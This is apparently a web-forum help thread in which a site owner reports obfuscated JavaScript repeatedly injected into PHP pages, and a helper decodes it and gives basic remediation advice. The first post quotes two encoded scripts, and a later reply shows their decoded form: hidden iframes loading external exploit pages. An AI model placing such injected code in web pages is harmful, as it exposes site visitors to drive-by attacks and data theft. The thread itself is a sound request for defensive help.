Malicious Javascript Code in PHP Files - Hackers?

[olimits7]

Hello,

 

I've recently been noticing the following malicious javascript code in certain php files on my webserver. It seems it's mainly focusing on targeting all index.php, main.php, and login.php pages.

 

When I load my homepage I see on the bottom corner of the IE in the status bar section it says "Waiting for http://fen0men.info/exp/index.php..." which is definitely some type of malicious script trying to run.

 

This is what I see in some of the my php files:

 

<script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%31%31%64%62%64%37%34%32%32%62%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%61%6c%6c%74%72%61%66%66%2e%72%75%2f%6c%6f%6c%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%32%30%30%31%36%38%29%2b%27%62%31%33%62%36%65%5c%27%20%77%69%64%74%68%3d%37%36%34%20%68%65%69%67%68%74%3d%32%36%32%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); </script>

and

<script language="JavaScript"> document.write(String.fromCharCode(60, 105, 102, 114, 97, 109, 101, 32, 115, 114, 99, 61, 34, 104, 116, 116, 112, 58, 47, 47, 102, 101, 110, 48, 109, 101, 110, 46, 105, 110, 102, 111, 47, 101, 120, 112, 47, 105, 110, 100, 101, 120, 46, 112, 104, 112, 34, 32, 119, 105, 100, 116, 104, 61, 34, 48, 34, 32, 104, 101, 105, 103, 104, 116, 61, 34, 48, 34, 62, 60, 47, 105, 102, 114, 97, 109, 101, 62)); </script>

 

I tried deleting the code, but then when I check my website the next day the code is back in there. I'm guessing I have a security hole somewhere in my website. Does anybody know how I can fix and close these security holes?? How did these hackers get access to my website??

 

Thank you,

 

olimits7

[germ]

This is what I get when I decode the scripts:

 

window.status='Done';document.write('<iframe name=11dbd7422b src=\'http://alltraff.ru/lol.php?'+Math.round(Math.random()*200168)+'b13b6e\' width=764 height=262 style=\'display: none\'></iframe>')

 

And:

 

<iframe src="http://fen0men.info/exp/index.php" width="0" height="0"></iframe>

 

Change all your passwords (to your osc admin, your site's control panel, and all .htaccess).

 

After fixing the modified pages, change them to "read only" (444 permissions) to see if that helps.

 

Report the hack to your web host. The server may have been hacked. If that's the case, nothing you do can stop it.

[olimits7]

Thank you for your quick reply.

 

Ok, I will make the following changes and see what happens. I am on a managed dedicated server so I do know that I'm the only website on that server. I'll try contacting my hosting company to see if they can check to see if there is something wrong with the server. When I call them should I tell them to check anything in particular??

 

Thanks for decoding the scripts!! Do you know what these scripts actually do to my website??

 

Thanks again,

 

olimits7

[germ]

The scripts are a way to steal information.

 

I'm thinking they should be able to look at the server logs for your site and at least get clue as to how they're getting in.

[olimits7]

I have access to Webmin on my server. Do you think I can access the logs myself from there?

 

olimits7

[germ]

If you did, would you know what to look for in the logs?

:unsure:

 

I'm not exactly sure what you should be looking for myself, but I still think the logs could reveal something.